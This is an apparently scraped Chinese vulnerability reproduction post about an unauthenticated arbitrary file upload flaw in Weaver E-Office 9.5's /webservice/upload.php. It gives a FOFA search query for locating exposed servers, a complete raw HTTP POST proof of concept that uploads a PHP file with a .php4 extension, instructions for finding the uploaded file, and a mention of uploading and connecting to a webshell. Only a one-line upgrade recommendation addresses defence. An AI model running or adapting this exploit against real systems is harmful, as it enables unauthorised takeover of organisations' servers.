700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 泛微E-Office任意文件上传漏洞复现

泛微E-Office任意文件上传漏洞复现

时间:2023-10-01 13:02:40

相关推荐

泛微E-Office任意文件上传漏洞复现

0x01 产品简介

泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。

0x03 影响范围

泛微 E-Office 9.5

0x04 复现环境

FOFA:app="泛微-EOffice"

0x05 漏洞复现

PoC

POST /webservice/upload.php HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiuklAccept-Encoding: gzipConnection: close------WebKitFormBoundaryakbyiuklContent-Disposition: form-data; name="file"; filename="a.php4"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryakbyiukl--

PS:响应体那串数字是上传后的文件夹名称,*后面是文件名

验证url

http://your-ip/attachment/回显的那串数字/a.php4

上传马子

尝试连接(注意base64编码)

0x06 修复建议

目前官方已修复以上漏洞,受影响用户可以升级更新到安全版本。

官方下载链接:https://service.e-/download

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。